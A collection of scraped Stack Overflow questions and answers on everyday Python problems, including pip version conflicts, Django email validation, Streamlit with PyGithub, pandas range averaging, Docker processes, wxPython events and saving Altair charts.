| Pip package version conflicts despite seemingly matching ranges | When using pip install -r requirements.txt, I get ERROR: Cannot install -r requirements.txt (line 3), [...] because these package versions have conflicting dependencies..
And further:
The conflict is caused by:
tensorflow 2.11.0 depends on protobuf<3.20 and >=3.9.2
tensorboard 2.11.0 depends on protobuf<4 and >=3.9.2
wandb 0.13.5 depends on protobuf!=4.0.*, !=4.21.0, <5 and >=3.12.0
I don't see any conflicts in these ranges - every version in [3.12.0, 3.20) should be fine. Can someone explain the problem?
Update: As a workaround, I removed all version restrictions and only specified the names of the libraries in the requirements.txt file. Now it works. But I still don't see a problem with the above ranges, so I'll leave the question open.
| [
"I would suggest that, rather than using a range of versions, use a specific version you know works. That way, there won't be any problems.\nI think that one of the versions of the dependencies is incompatible with the main module, and since it is within the range of versions you ask for, pip tries to intall it and fails to do so since it is incompatible.\nAlso, pip normally handles dependencies automatically.\n"
] | [
0
] | [] | [] | [
"pip",
"python"
] | stackoverflow_0074602039_pip_python.txt |
Q:
Django: How to check if something is an email without a form
I have HTML form to post in Django View and because of some constraints, it's easier for me to do the validation without the usual Django form classes.
My only reason to use Django Forms is Email Field(s) that are entered.
Is there any function to check if something is an email or I have to use the EmailField to check and validate it?
A:
You can use the following
from django.core.validators import validate_email
from django import forms
...
if request.method == "POST":
try:
validate_email(request.POST.get("email", ""))
except forms.ValidationError:
...
assuming you have a <input type="text" name="email" /> in your form
A:
You can use the validate_email() method from django.core.validators:
>>> from django.core import validators
>>> validators.validate_email('[email protected]')
>>> validators.validate_email('test@examplecom')
Traceback (most recent call last):
File "<console>", line 1, in <module>
File "/Users/jasper/Sites/iaid/env/lib/python2.7/site- packages/django/core/validators.py", line 155, in __call__
super(EmailValidator, self).__call__(u'@'.join(parts))
File "/Users/jasper/Sites/iaid/env/lib/python2.7/site-packages/django/core/validators.py", line 44, in __call__
raise ValidationError(self.message, code=self.code)
ValidationError: [u'Enter a valid e-mail address.']
A:
import re
Using Python
def check_email(email) -> bool:
# The regular expression
pat = r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
if re.match(pat, email):
return True
else:
return False
Using regular expression to validate the email
Using Django but this raise a validation error
from django.core import validators
validators.validate_email("[email protected]")
| Django: How to check if something is an email without a form | I have HTML form to post in Django View and because of some constraints, it's easier for me to do the validation without the usual Django form classes.
My only reason to use Django Forms is Email Field(s) that are entered.
Is there any function to check if something is an email or I have to use the EmailField to check and validate it?
| [
"You can use the following\nfrom django.core.validators import validate_email\nfrom django import forms\n\n...\nif request.method == \"POST\":\n try:\n validate_email(request.POST.get(\"email\", \"\"))\n except forms.ValidationError:\n ...\n\nassuming you have a <input type=\"text\" name=\"email\" /> in your form\n",
"You can use the validate_email() method from django.core.validators:\n>>> from django.core import validators\n>>> validators.validate_email('[email protected]')\n>>> validators.validate_email('test@examplecom')\nTraceback (most recent call last):\n File \"<console>\", line 1, in <module>\n File \"/Users/jasper/Sites/iaid/env/lib/python2.7/site- packages/django/core/validators.py\", line 155, in __call__\n super(EmailValidator, self).__call__(u'@'.join(parts))\n File \"/Users/jasper/Sites/iaid/env/lib/python2.7/site-packages/django/core/validators.py\", line 44, in __call__\n raise ValidationError(self.message, code=self.code)\nValidationError: [u'Enter a valid e-mail address.']\n\n",
"import re\n\nUsing Python\ndef check_email(email) -> bool:\n # The regular expression\n pat = r'\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Z|a-z]{2,}\\b'\n if re.match(pat, email):\n return True\n else:\n return False\n\nUsing regular expression to validate the email\nUsing Django but this raise a validation error\nfrom django.core import validators\nvalidators.validate_email(\"[email protected]\")\n\n"
] | [
37,
6,
0
] | [] | [] | [
"django",
"emailfield",
"python"
] | stackoverflow_0013996622_django_emailfield_python.txt |
Q:
How to use PyGithub with Streamlit to build a webapp
I want to create a script that deploys with Streamlit in python that lists the contents of a specific repository. Is it even possible? because I'm trying it and it always says this:
ImportError: cannot import name 'Github' from 'github' (/Library/Frameworks/Python.framework/Versions/3.9/lib/python3.9/site-packages/github/__init__.py)
Traceback:
File "/Library/Frameworks/Python.framework/Versions/3.9/lib/python3.9/site-packages/streamlit/runtime/scriptrunner/script_runner.py", line 564, in _run_script
exec(code, module.__dict__)
File "/Users/blanc/Desktop/My-notes/webpage.py", line 1, in <module>
from github import Github
I have literally this import that works with output in console:
from github import Github
I've checked like 18 times that I have the requeriments intalled(and the correct version of PyGithub) and I don't know what else can I do.
Hope you can help me :)
This is the code I'm using:
from github import Github
def list_content_repo():
g = Github()
# github username
username = g.get_user("gitblanc")
# Obtain the repository
repo = username.get_repo("Obsidian-Notes")
print(repo.get_contents(""))
A:
Just to let you know that I don't have issues with pygithub and streamlit.
Code
main.py
from github import Github
import streamlit as st
def list_content_repo():
g = Github()
username = g.get_user("gitblanc")
repo = username.get_repo("Obsidian-Notes")
contents = repo.get_contents("")
st.write('#### Contents')
st.write(contents)
if __name__ == '__main__':
list_content_repo()
Output
Setup
Try to setup your development environment this way. Let us see if you still have an issue. I am using windows 10 and use virtual environment. Open powershell.
PS C:\Users\ferdi> f:
I use drive f.
PS F:\> mkdir temp_streamlit
PS F:\> cd temp_streamlit
PS F:\temp_streamlit> python --version
Python 3.10.6
PS F:\temp_streamlit> python -m venv myvenv
PS F:\temp_streamlit> ./myvenv/scripts/activate
(myvenv) PS F:\temp_streamlit> python -m pip install pip -U
(myvenv) PS F:\temp_streamlit> pip install streamlit
(myvenv) PS F:\temp_streamlit> pip install pygithub
Create main.py using the above code and run streamlit.
(myvenv) PS F:\temp_streamlit> streamlit run main.py
You should see the same output above.
| How to use PyGithub with Streamlit to build a webapp | I want to create a script that deploys with Streamlit in python that lists the contents of a specific repository. Is it even possible? because I'm trying it and it always says this:
ImportError: cannot import name 'Github' from 'github' (/Library/Frameworks/Python.framework/Versions/3.9/lib/python3.9/site-packages/github/__init__.py)
Traceback:
File "/Library/Frameworks/Python.framework/Versions/3.9/lib/python3.9/site-packages/streamlit/runtime/scriptrunner/script_runner.py", line 564, in _run_script
exec(code, module.__dict__)
File "/Users/blanc/Desktop/My-notes/webpage.py", line 1, in <module>
from github import Github
I have literally this import that works with output in console:
from github import Github
I've checked like 18 times that I have the requeriments intalled(and the correct version of PyGithub) and I don't know what else can I do.
Hope you can help me :)
This is the code I'm using:
from github import Github
def list_content_repo():
g = Github()
# github username
username = g.get_user("gitblanc")
# Obtain the repository
repo = username.get_repo("Obsidian-Notes")
print(repo.get_contents(""))
| [
"Just to let you know that I don't have issues with pygithub and streamlit.\nCode\nmain.py\nfrom github import Github\nimport streamlit as st\n\n\ndef list_content_repo():\n g = Github()\n username = g.get_user(\"gitblanc\")\n repo = username.get_repo(\"Obsidian-Notes\")\n contents = repo.get_contents(\"\")\n\n st.write('#### Contents')\n st.write(contents)\n\n\nif __name__ == '__main__':\n list_content_repo()\n\nOutput\n\nSetup\nTry to setup your development environment this way. Let us see if you still have an issue. I am using windows 10 and use virtual environment. Open powershell.\nPS C:\\Users\\ferdi> f:\n\nI use drive f.\nPS F:\\> mkdir temp_streamlit\n\nPS F:\\> cd temp_streamlit\nPS F:\\temp_streamlit> python --version\nPython 3.10.6\n\nPS F:\\temp_streamlit> python -m venv myvenv\n\nPS F:\\temp_streamlit> ./myvenv/scripts/activate\n\n(myvenv) PS F:\\temp_streamlit> python -m pip install pip -U\n\n(myvenv) PS F:\\temp_streamlit> pip install streamlit\n\n(myvenv) PS F:\\temp_streamlit> pip install pygithub\n\nCreate main.py using the above code and run streamlit.\n(myvenv) PS F:\\temp_streamlit> streamlit run main.py\n\nYou should see the same output above.\n"
] | [
1
] | [] | [] | [
"python",
"streamlit"
] | stackoverflow_0074585843_python_streamlit.txt |
Q:
cursor.fetchone() returns NoneType but it has value, how to collect values in a list?
def get_user_data(username: str, columns: list):
result = []
for column in columns:
query = f"SELECT {column} FROM ta_users WHERE username = '{username}'"
cursor.execute(query)
print('cursor.fetchone() from loop = ', cursor.fetchone(),
'type= ', type(cursor.fetchone())) # debug
fetchone = cursor.fetchone()
result.append(fetchone[0])
raises:
result.append(fetchone[0])
TypeError: 'NoneType' object is not subscriptable
the print above returns:
cursor.fetchone() from loop = ('6005441021308034',) type= <class
'NoneType'>
I read why it can return None, but i did not figure out how to work around it.
how to make it work and return list of values after the loop?
A:
You are "emptying" it in the first fetchone() run, that's why you are getting None in the following (it looks for the second record, but can't find it. Try this code:
def get_user_data(username: str, columns: list):
result = []
for column in columns:
query = f"SELECT {column} FROM ta_users WHERE username = '{username}'"
cursor.execute(query)
res = cursor.fetchone()
print('cursor.fetchone() from loop = ', res,
'type= ', type(res))) # debug
if res:
result.append(res[0])
| cursor.fetchone() returns NoneType but it has value, how to collect values in a list? | def get_user_data(username: str, columns: list):
result = []
for column in columns:
query = f"SELECT {column} FROM ta_users WHERE username = '{username}'"
cursor.execute(query)
print('cursor.fetchone() from loop = ', cursor.fetchone(),
'type= ', type(cursor.fetchone())) # debug
fetchone = cursor.fetchone()
result.append(fetchone[0])
raises:
result.append(fetchone[0])
TypeError: 'NoneType' object is not subscriptable
the print above returns:
cursor.fetchone() from loop = ('6005441021308034',) type= <class
'NoneType'>
I read why it can return None, but i did not figure out how to work around it.
how to make it work and return list of values after the loop?
| [
"You are \"emptying\" it in the first fetchone() run, that's why you are getting None in the following (it looks for the second record, but can't find it. Try this code:\ndef get_user_data(username: str, columns: list):\n result = []\n for column in columns:\n query = f\"SELECT {column} FROM ta_users WHERE username = '{username}'\"\n cursor.execute(query)\n res = cursor.fetchone()\n print('cursor.fetchone() from loop = ', res,\n 'type= ', type(res))) # debug\n if res:\n result.append(res[0])\n\n"
] | [
1
] | [] | [] | [
"database_cursor",
"postgresql",
"python",
"typeerror"
] | stackoverflow_0074602170_database_cursor_postgresql_python_typeerror.txt |
Q:
Docker Run two unending programs python
I am trying to run a flask server (app.py) and a script which, evry 5 minutes, sends a request to that server.
Dockerfile
FROM ubuntu:18.04
RUN apt-get update -y && apt-get install -y python3 python3-pip
COPY ./requirement.txt /app/requirement.txt
WORKDIR /app
RUN pip3 install -r requirement.txt
COPY ./src /app
EXPOSE 8022
ENTRYPOINT ["python3"]
CMD ["metricRequester.py &"]
CMD ["app.py"]
metricRequester.py
import sched, time
import requests
s = sched.scheduler(time.time, time.sleep)
def sendRequest(sc):
print("Sending Request")
requestString = "http://127.0.0.1:8022/"
try:
response = requests.get(requestString)
except Exception as e:
print("Couldn't send request")
print(e)
print("Request sent")
sc.enter(300, 1, sendRequest, (sc,))
s.enter(300, 1, sendRequest, (s,))
s.run()
When I run the app.py and metricRequester on my laptop they both work correctly.
I am trying to make a local dockerfile which runs both of these scripts.
With my current dockerfile, only the app.py seems to be running. It is reachable on port 8022. But I am not seeing any metrics emails coming through, indicating that metricRequester.py is not running.
How do I rewrite my Dockerfile to allow for both scripts to run.
A:
The ideal setup is to have one process running in one container. So it's good to run app.py and metricRequestr.py in two separate containers. So have two Dockerfiles:
Dockerfile 1:
FROM ubuntu:18.04
RUN apt-get update -y && apt-get install -y python3 python3-pip
COPY ./requirement.txt /app/requirement.txt
WORKDIR /app
RUN pip3 install -r requirement.txt
COPY ./src /app
EXPOSE 8022
ENTRYPOINT ["python3"]
CMD ["metricRequester.py"]
Dockerfile2:
FROM ubuntu:18.04
RUN apt-get update -y && apt-get install -y python3 python3-pip
COPY ./requirement.txt /app/requirement.txt
WORKDIR /app
RUN pip3 install -r requirement.txt
COPY ./src /app
EXPOSE 8022
ENTRYPOINT ["python3"]
CMD ["app.py"]
The Ports will vary for each containers.
| Docker Run two unending programs python | I am trying to run a flask server (app.py) and a script which, evry 5 minutes, sends a request to that server.
Dockerfile
FROM ubuntu:18.04
RUN apt-get update -y && apt-get install -y python3 python3-pip
COPY ./requirement.txt /app/requirement.txt
WORKDIR /app
RUN pip3 install -r requirement.txt
COPY ./src /app
EXPOSE 8022
ENTRYPOINT ["python3"]
CMD ["metricRequester.py &"]
CMD ["app.py"]
metricRequester.py
import sched, time
import requests
s = sched.scheduler(time.time, time.sleep)
def sendRequest(sc):
print("Sending Request")
requestString = "http://127.0.0.1:8022/"
try:
response = requests.get(requestString)
except Exception as e:
print("Couldn't send request")
print(e)
print("Request sent")
sc.enter(300, 1, sendRequest, (sc,))
s.enter(300, 1, sendRequest, (s,))
s.run()
When I run the app.py and metricRequester on my laptop they both work correctly.
I am trying to make a local dockerfile which runs both of these scripts.
With my current dockerfile, only the app.py seems to be running. It is reachable on port 8022. But I am not seeing any metrics emails coming through, indicating that metricRequester.py is not running.
How do I rewrite my Dockerfile to allow for both scripts to run.
| [
"The ideal setup is to have one process running in one container. So it's good to run app.py and metricRequestr.py in two separate containers. So have two Dockerfiles:\nDockerfile 1:\nFROM ubuntu:18.04\nRUN apt-get update -y && apt-get install -y python3 python3-pip\n\nCOPY ./requirement.txt /app/requirement.txt\nWORKDIR /app\nRUN pip3 install -r requirement.txt\nCOPY ./src /app\n\nEXPOSE 8022\n\nENTRYPOINT [\"python3\"]\nCMD [\"metricRequester.py\"]\n\nDockerfile2:\nFROM ubuntu:18.04\nRUN apt-get update -y && apt-get install -y python3 python3-pip\n\nCOPY ./requirement.txt /app/requirement.txt\nWORKDIR /app\nRUN pip3 install -r requirement.txt\nCOPY ./src /app\n\nEXPOSE 8022\n\nENTRYPOINT [\"python3\"]\nCMD [\"app.py\"]\n\nThe Ports will vary for each containers.\n"
] | [
0
] | [] | [] | [
"docker",
"flask",
"python"
] | stackoverflow_0074601447_docker_flask_python.txt |
Q:
Take average of range entities and replace it in pandas column
I have dataframe where one column looks like
Average Weight (Kg)
0.647
0.88
0
0.73
1.7 - 2.1
1.2 - 1.5
2.5
NaN
1.5 - 1.9
1.3 - 1.5
0.4
1.7 - 2.9
Reproducible data
df = pd.DataFrame([0.647,0.88,0,0.73,'1.7 - 2.1','1.2 - 1.5',2.5 ,np.NaN,'1.5 - 1.9','1.3 - 1.5',0.4,'1.7 - 2.9'],columns=['Average Weight (Kg)'])
where I would like to take average of range entries and replace it in the dataframe e.g. 1.7 - 2.1 will be replaced by 1.9 , following code doesn't work TypeError: 'float' object is not iterable
np.where(df['Average Weight (Kg)'].str.contains('-'), df['Average Weight (Kg)'].str.split('-')
.apply(lambda x: statistics.mean((list(map(float, x)) ))), df['Average Weight (Kg)'])
A:
Another possible solution, which is based on the following ideas:
Convert column to string.
Split each cell by \s-\s.
Explode column.
Convert back to float.
Group by and mean.
df['Average Weight (Kg)'] = df['Average Weight (Kg)'].astype(
str).str.split(r'\s-\s').explode().astype(float).groupby(level=0).mean()
Output:
Average Weight (Kg)
0 0.647
1 0.880
2 0.000
3 0.730
4 1.900
5 1.350
6 2.500
7 NaN
8 1.700
9 1.400
10 0.400
11 2.300
A:
edit: slight change to avoid creating a new column
You could go for something like this (renamed your column name to avg, cause it was long to type :-) ):
new_average =(df.avg.str.split('-').str[1].astype(float) + df.avg.str.split('-').str[0].astype(float) ) / 2
df["avg"] = new_average.fillna(df.avg)
yields for avg:
0 0.647
1 0.880
2 0.000
3 0.730
4 1.900
5 1.350
6 2.500
7 NaN
8 1.700
9 1.400
10 0.400
11 2.300
Name: avg2, dtype: float64
| Take average of range entities and replace it in pandas column | I have dataframe where one column looks like
Average Weight (Kg)
0.647
0.88
0
0.73
1.7 - 2.1
1.2 - 1.5
2.5
NaN
1.5 - 1.9
1.3 - 1.5
0.4
1.7 - 2.9
Reproducible data
df = pd.DataFrame([0.647,0.88,0,0.73,'1.7 - 2.1','1.2 - 1.5',2.5 ,np.NaN,'1.5 - 1.9','1.3 - 1.5',0.4,'1.7 - 2.9'],columns=['Average Weight (Kg)'])
where I would like to take average of range entries and replace it in the dataframe e.g. 1.7 - 2.1 will be replaced by 1.9 , following code doesn't work TypeError: 'float' object is not iterable
np.where(df['Average Weight (Kg)'].str.contains('-'), df['Average Weight (Kg)'].str.split('-')
.apply(lambda x: statistics.mean((list(map(float, x)) ))), df['Average Weight (Kg)'])
| [
"Another possible solution, which is based on the following ideas:\n\nConvert column to string.\n\nSplit each cell by \\s-\\s.\n\nExplode column.\n\nConvert back to float.\n\nGroup by and mean.\n\n\ndf['Average Weight (Kg)'] = df['Average Weight (Kg)'].astype(\n str).str.split(r'\\s-\\s').explode().astype(float).groupby(level=0).mean()\n\nOutput:\n Average Weight (Kg)\n0 0.647\n1 0.880\n2 0.000\n3 0.730\n4 1.900\n5 1.350\n6 2.500\n7 NaN\n8 1.700\n9 1.400\n10 0.400\n11 2.300\n\n",
"edit: slight change to avoid creating a new column\nYou could go for something like this (renamed your column name to avg, cause it was long to type :-) ):\nnew_average =(df.avg.str.split('-').str[1].astype(float) + df.avg.str.split('-').str[0].astype(float) ) / 2\ndf[\"avg\"] = new_average.fillna(df.avg)\n\nyields for avg:\n0 0.647\n1 0.880\n2 0.000\n3 0.730\n4 1.900\n5 1.350\n6 2.500\n7 NaN\n8 1.700\n9 1.400\n10 0.400\n11 2.300\nName: avg2, dtype: float64\n\n"
] | [
2,
1
] | [] | [] | [
"numpy",
"pandas",
"python"
] | stackoverflow_0074601918_numpy_pandas_python.txt |
Q:
Wxpython: Bind works only on double click, but single click is desired
I have a table with checkboxes. I want to bind the box checking to a method onClick but that method activates only when I double click a record, while I want it to be activated when a single click is pressed.
import wx
from wx import ListEvent
class MyFrame(wx.Frame):
def onClick(self, event: ListEvent):
print(event.EventObject)
def __init__(self):
wx.Frame.__init__(self, None, -1, 'List ctrl example', size=(500, 700))
self._list_ctrl = wx.ListCtrl(self, -1, style=wx.LC_REPORT | wx.LC_SINGLE_SEL)
self._list_ctrl.InsertColumn(0, 'Checkbox', format=wx.LIST_FORMAT_LEFT, width = 50)
self._list_ctrl.InsertColumn(1, 'Data', format=wx.LIST_FORMAT_LEFT, width = 200)
self._list_ctrl.InsertColumn(2, 'Test', format=wx.LIST_FORMAT_LEFT, width = 200)
# self._list_ctrl.SetColumnWidth(0, 200)
self._list_ctrl.EnableCheckBoxes()
for i in range(0, 50):
# index = self._list_ctrl.InsertItem(i, '')
self._list_ctrl.InsertItem(0, '')
self._list_ctrl.SetItem(0, 1, 'item: ' + str(i))
self._list_ctrl.SetItem(0, 2, 'label')
self._list_ctrl.CheckItem(0, True)
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.onClick, self._list_ctrl)
self.Layout()
class MyApp(wx.App):
def OnInit(self):
frame = MyFrame()
frame.Show(True)
return True
if __name__ == '__main__':
app = MyApp(False)
app.MainLoop()
A:
Instead of wx.EVT_LIST_ITEM_ACTIVATED use wx.EVT_LIST_ITEM_SELECTED
| Wxpython: Bind works only on double click, but single click is desired | I have a table with checkboxes. I want to bind the box checking to a method onClick but that method activates only when I double click a record, while I want it to be activated when a single click is pressed.
import wx
from wx import ListEvent
class MyFrame(wx.Frame):
def onClick(self, event: ListEvent):
print(event.EventObject)
def __init__(self):
wx.Frame.__init__(self, None, -1, 'List ctrl example', size=(500, 700))
self._list_ctrl = wx.ListCtrl(self, -1, style=wx.LC_REPORT | wx.LC_SINGLE_SEL)
self._list_ctrl.InsertColumn(0, 'Checkbox', format=wx.LIST_FORMAT_LEFT, width = 50)
self._list_ctrl.InsertColumn(1, 'Data', format=wx.LIST_FORMAT_LEFT, width = 200)
self._list_ctrl.InsertColumn(2, 'Test', format=wx.LIST_FORMAT_LEFT, width = 200)
# self._list_ctrl.SetColumnWidth(0, 200)
self._list_ctrl.EnableCheckBoxes()
for i in range(0, 50):
# index = self._list_ctrl.InsertItem(i, '')
self._list_ctrl.InsertItem(0, '')
self._list_ctrl.SetItem(0, 1, 'item: ' + str(i))
self._list_ctrl.SetItem(0, 2, 'label')
self._list_ctrl.CheckItem(0, True)
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.onClick, self._list_ctrl)
self.Layout()
class MyApp(wx.App):
def OnInit(self):
frame = MyFrame()
frame.Show(True)
return True
if __name__ == '__main__':
app = MyApp(False)
app.MainLoop()
| [
"Instead of wx.EVT_LIST_ITEM_ACTIVATED use wx.EVT_LIST_ITEM_SELECTED\n"
] | [
0
] | [] | [] | [
"python",
"user_interface",
"wxpython"
] | stackoverflow_0074602199_python_user_interface_wxpython.txt |
Q:
I am trying to sort a csv alphabetically but its not happening
I am trying to sort a csv file alphabetically by the package column. I am using this code
import pandas as pandasForSortingCSV
# assign dataset
csvData = pandasForSortingCSV.read_csv("python_packages.csv")
# displaying unsorted data frame
print("\nBefore sorting:")
print(csvData)
# sort data frame
csvData.sort_values(["package"],
axis=0,
inplace=True)
# displaying sorted data frame
print("\nAfter sorting:")
print(csvData)
These are the results
Before sorting:
package version labels
0 absl-py 1.2.0 ['util-busybox', 'unknown']
1 aiohttp 3.8.3 ['util-busybox', 'unknown']
2 aiosignal 1.3.1 ['util-busybox', 'unknown']
3 appdirs 1.4.4 ['util-busybox', 'unknown']
4 ascalon-audio-data-utils 0.3.37 ['util-busybox', 'unknown']
After sorting:
package version labels
29 Flask 2.2.2 ['util-busybox', 'unknown']
30 Flask-SQLAlchemy 3.0.2 ['util-busybox', 'unknown']
46 Jinja2 3.1.2 ['util-busybox', 'unknown']
49 Keras-Preprocessing 1.1.2 ['util-busybox', 'unknown']
55 Markdown 3.4.1 ['util-busybox', 'unknown']
I don't understand how is it sorting and why I cant get it sort alphabetically
I tried using the sorted as well
# import modules
import csv, operator
# load csv file
data = csv.reader(open('python_packages.csv'), delimiter=',')
# sort data on the basis of age
data = sorted(data, key=operator.itemgetter(0))
# displaying sorted data
print(data)
this is the error I am getting
data = sorted(data, key=operator.itemgetter(0))
IndexError: list index out of range
package is the first column
this is befalling me
A:
The sorting in python is a little weird. Uppercase letters always become first before lower case letters irregardless of the letter. You can use this to sort it properly:
import pandas as pandasForSortingCSV
# assign dataset
csvData = pandasForSortingCSV.read_csv("python_packages.csv")
# displaying unsorted data frame
print("\nBefore sorting:")
print(csvData)
# sort data frame
csvData.sort_values(["package"],
axis=0,
inplace=True, key=lambda col: col.str.lower())
# displaying sorted data frame
print("\nAfter sorting:")
print(csvData)
col.str.lower() converts the name into the lowercase version so the capital letters don't matter.
| I am trying to sort a csv alphabetically but its not happening | I am trying to sort a csv file alphabetically by the package column. I am using this code
import pandas as pandasForSortingCSV
# assign dataset
csvData = pandasForSortingCSV.read_csv("python_packages.csv")
# displaying unsorted data frame
print("\nBefore sorting:")
print(csvData)
# sort data frame
csvData.sort_values(["package"],
axis=0,
inplace=True)
# displaying sorted data frame
print("\nAfter sorting:")
print(csvData)
These are the results
Before sorting:
package version labels
0 absl-py 1.2.0 ['util-busybox', 'unknown']
1 aiohttp 3.8.3 ['util-busybox', 'unknown']
2 aiosignal 1.3.1 ['util-busybox', 'unknown']
3 appdirs 1.4.4 ['util-busybox', 'unknown']
4 ascalon-audio-data-utils 0.3.37 ['util-busybox', 'unknown']
After sorting:
package version labels
29 Flask 2.2.2 ['util-busybox', 'unknown']
30 Flask-SQLAlchemy 3.0.2 ['util-busybox', 'unknown']
46 Jinja2 3.1.2 ['util-busybox', 'unknown']
49 Keras-Preprocessing 1.1.2 ['util-busybox', 'unknown']
55 Markdown 3.4.1 ['util-busybox', 'unknown']
I don't understand how is it sorting and why I cant get it sort alphabetically
I tried using the sorted as well
# import modules
import csv, operator
# load csv file
data = csv.reader(open('python_packages.csv'), delimiter=',')
# sort data on the basis of age
data = sorted(data, key=operator.itemgetter(0))
# displaying sorted data
print(data)
this is the error I am getting
data = sorted(data, key=operator.itemgetter(0))
IndexError: list index out of range
package is the first column
this is befalling me
| [
"The sorting in python is a little weird. Uppercase letters always become first before lower case letters irregardless of the letter. You can use this to sort it properly:\nimport pandas as pandasForSortingCSV\n\n# assign dataset\ncsvData = pandasForSortingCSV.read_csv(\"python_packages.csv\")\n\n# displaying unsorted data frame\nprint(\"\\nBefore sorting:\")\nprint(csvData)\n\n# sort data frame\ncsvData.sort_values([\"package\"],\n axis=0,\n inplace=True, key=lambda col: col.str.lower())\n# displaying sorted data frame\nprint(\"\\nAfter sorting:\")\nprint(csvData)\n\ncol.str.lower() converts the name into the lowercase version so the capital letters don't matter.\n"
] | [
0
] | [] | [] | [
"csv",
"pandas",
"python",
"python_3.x",
"sorting"
] | stackoverflow_0074599953_csv_pandas_python_python_3.x_sorting.txt |
Q:
How to use two different versions of library in google colab?
How to use two different versions of library (for example, sklearn) in google colab?
I created two files in one I install version 0.21.3, and in the other the same version is installed immediately, how to make the versions in different files different?
A:
I don't think you can do this in python without complicated workarounds.
You could run a subprocess in a different python version using virtual environments via pyenv for each script.
I advise against it though. Maybe someone can make a good alternative suggestion if you tell us why you need to have different versions of the same library.
| How to use two different versions of library in google colab? | How to use two different versions of library (for example, sklearn) in google colab?
I created two files in one I install version 0.21.3, and in the other the same version is installed immediately, how to make the versions in different files different?
| [
"I don't think you can do this in python without complicated workarounds.\nYou could run a subprocess in a different python version using virtual environments via pyenv for each script.\nI advise against it though. Maybe someone can make a good alternative suggestion if you tell us why you need to have different versions of the same library.\n"
] | [
0
] | [] | [] | [
"anaconda",
"google_colaboratory",
"python",
"sklearn_pandas"
] | stackoverflow_0074600783_anaconda_google_colaboratory_python_sklearn_pandas.txt |
Q:
Max retries exceeded error when trying to save graph as png
every time when I try to save graph as png files, I could only save for a few times and then it will be a Max retries exceeded error:
MaxRetryError: HTTPConnectionPool(host='localhost', port=49307): Max retries exceeded with url: /session/90fd658175ea86931fe863c6f0bab370/url (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f35b033fb10>: Failed to establish a new connection: [Errno 111] Connection refused'))
So I cannot use altair for a long time and this will happen everytime I have some more graph to save. This is a huge problem for I need graphs saved as picture format for my further pipeline.
I run them on google colab, and this is how I install dependency to save graph as png:
!pip install altair_saver
!pip install selenium==4.2.0
!apt-get install chromium-chromedriver
now I have to change a runtime everytime for this error but my variables will be all lost.
Any solution to save picture as png without encountering this error? Thanks!
now I have to change a runtime everytime for this error but my variables will be all lost.
Any solution to save picture as png without encountering this error? Thanks!
A:
There are some issues with the altair_saver methods and the next version of altair will likely use a new library called vl-convert which fixes most saving issues, but until that is released, we have to use it manually. First do python -m pip install vl-convert-python from your environment, then you can try this:
import vl_convert as vlc
def save_chart(chart, filename, scale_factor=1):
'''
Save an Altair chart using vl-convert
Parameters
----------
chart : altair.Chart
Altair chart to save
filename : str
The path to save the chart to
scale_factor: int or float
The factor to scale the image resolution by.
E.g. A value of `2` means two times the default resolution.
'''
with alt.data_transformers.enable("default") and alt.data_transformers.disable_max_rows():
if filename.split('.')[-1] == 'svg':
with open(filename, "w") as f:
f.write(vlc.vegalite_to_svg(chart.to_dict()))
elif filename.split('.')[-1] == 'png':
with open(filename, "wb") as f:
f.write(vlc.vegalite_to_png(chart.to_dict(), scale=scale_factor))
else:
raise ValueError("Only svg and png formats are supported")
If you wanted to use this function to save a chart as a PNG file at 2x the default resolution you would type save_chart(my_chart, 'my-chart.png', 2) as in this example:
import pandas as pd
import altair as alt
source = pd.DataFrame({
'a': ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I'],
'b': [28, 55, 43, 91, 81, 53, 19, 87, 52]
})
my_chart = alt.Chart(source).mark_bar().encode(
x='a',
y='b'
)
save_chart(my_chart, 'my-chart.png', 2)
| Max retries exceeded error when trying to save graph as png | every time when I try to save graph as png files, I could only save for a few times and then it will be a Max retries exceeded error:
MaxRetryError: HTTPConnectionPool(host='localhost', port=49307): Max retries exceeded with url: /session/90fd658175ea86931fe863c6f0bab370/url (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f35b033fb10>: Failed to establish a new connection: [Errno 111] Connection refused'))
So I cannot use altair for a long time and this will happen everytime I have some more graph to save. This is a huge problem for I need graphs saved as picture format for my further pipeline.
I run them on google colab, and this is how I install dependency to save graph as png:
!pip install altair_saver
!pip install selenium==4.2.0
!apt-get install chromium-chromedriver
now I have to change a runtime everytime for this error but my variables will be all lost.
Any solution to save picture as png without encountering this error? Thanks!
now I have to change a runtime everytime for this error but my variables will be all lost.
Any solution to save picture as png without encountering this error? Thanks!
| [
"There are some issues with the altair_saver methods and the next version of altair will likely use a new library called vl-convert which fixes most saving issues, but until that is released, we have to use it manually. First do python -m pip install vl-convert-python from your environment, then you can try this:\nimport vl_convert as vlc\n\ndef save_chart(chart, filename, scale_factor=1):\n '''\n Save an Altair chart using vl-convert\n \n Parameters\n ----------\n chart : altair.Chart\n Altair chart to save\n filename : str\n The path to save the chart to\n scale_factor: int or float\n The factor to scale the image resolution by.\n E.g. A value of `2` means two times the default resolution.\n '''\n with alt.data_transformers.enable(\"default\") and alt.data_transformers.disable_max_rows():\n if filename.split('.')[-1] == 'svg':\n with open(filename, \"w\") as f:\n f.write(vlc.vegalite_to_svg(chart.to_dict()))\n elif filename.split('.')[-1] == 'png':\n with open(filename, \"wb\") as f:\n f.write(vlc.vegalite_to_png(chart.to_dict(), scale=scale_factor))\n else:\n raise ValueError(\"Only svg and png formats are supported\")\n\nIf you wanted to use this function to save a chart as a PNG file at 2x the default resolution you would type save_chart(my_chart, 'my-chart.png', 2) as in this example:\nimport pandas as pd\nimport altair as alt\n\n\nsource = pd.DataFrame({\n 'a': ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I'],\n 'b': [28, 55, 43, 91, 81, 53, 19, 87, 52]\n})\nmy_chart = alt.Chart(source).mark_bar().encode(\n x='a',\n y='b'\n)\n\nsave_chart(my_chart, 'my-chart.png', 2)\n\n"
] | [
0
] | [] | [] | [
"altair",
"python"
] | stackoverflow_0074512623_altair_python.txt |
Q:
How to avoid loading wrong libraries when using a subprocess.Popen() from a python script to run a venv?
